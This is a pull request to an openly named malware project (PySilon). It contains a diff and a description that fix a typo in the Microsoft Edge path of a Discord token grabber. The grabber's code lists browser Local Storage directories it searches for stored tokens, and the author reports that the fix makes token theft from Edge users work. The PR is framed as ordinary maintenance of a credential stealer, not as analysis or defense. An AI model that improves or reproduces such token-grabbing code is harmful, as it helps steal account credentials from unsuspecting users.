### PR TITLE
Fix discord token grabber for Microsoft Edge

### DIFF
--- a/resources/discord_token_grabber.py
+++ b/resources/discord_token_grabber.py
@@ -45,7 +45,7 @@ class extract_tokens:
             'Chrome4': self.appdata + '\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\',
             'Chrome5': self.appdata + '\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\',
             'Epic Privacy Browser': self.appdata + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
-            'Microsoft Edge': self.appdata + '\\Microsoft\\Edge\\User Data\\Defaul\\Local Storage\\leveldb\\',
+            'Microsoft Edge': self.appdata + '\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\',
             'Uran': self.appdata + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
             'Yandex': self.appdata + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
             'Brave': self.appdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',


### PR DESCRIPTION
I have Microsoft Edge, and the discord token grabber wasn't working for me. Today, I was trying to find out why, and I found it was because of a bug.

[Line 48](https://github.com/HorridModz/PySilon-malware/blob/9c3176ca73631491a362ed04ecc96b9a65e95c83/resources/discord_token_grabber.py#L48) says this:
```py
'Microsoft Edge': self.appdata + '\\Microsoft\\Edge\\User Data\\Defaul\\Local Storage\\leveldb\\',
```

There is a typo in this path: Instead of `Default`, it says `Defaul`. This leads to the token grabber failing to find tokens for Microsoft Edge.
To fix it, I simply corrected the typo:
```py
'Microsoft Edge': self.appdata + '\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\',
```
and it works!